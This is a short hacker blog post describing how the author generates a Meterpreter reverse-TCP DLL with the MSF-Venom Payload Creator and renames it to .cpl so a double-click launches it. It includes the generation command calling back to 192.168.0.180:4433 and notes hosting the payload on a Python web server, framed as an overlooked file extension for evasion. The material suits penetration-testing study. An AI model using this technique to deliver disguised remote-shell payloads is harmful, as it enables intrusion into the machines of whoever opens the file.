Interesting .DLL,.CPL,EXE*

I was looking around at folder tricks and how they could be re-purposed for evil, gotta sharpen my mind to be super nasty (honey badger like if you will) anyway I was on this site
http://blog.omotech.com/?p=1247 I thought Hmm what's this .cpl file type business ... so I search my computer for one listed ...

It has the same icon as a .DLL, I wonder if it behaves like a .DLL

So, I jump on my Linux box and using g0tm1lk's MSF-Venom Payload Creator create a meterpreter dll that will as most of you can probably see, when executed connect back to 192.168.0.180 on port 4433

./mpc.sh dll 192.168.0.180 4433 msf reverse staged tcp

Done

as you can see mpc even shows you how to make the payload accessible over the network via a simple Python web-server, so ... do that.

rename it from .dll to .cpl

You now have an executable meterpreter payload that will launch from a click, what's cool about this is that it IS a .dll but you cant doubleclick and launch it as a .dll yet, a .cpl file you can, this might only be useful for evasion in terms of it's an executable file extension that goes overlooked ... and i'll be looking for more

I didn't know about this technique until I was playing around

Video here

https://www.youtube.com/embed/64x-i_siZHU

Some other information on .cpl abuse

The TrendMicro piece is pretty good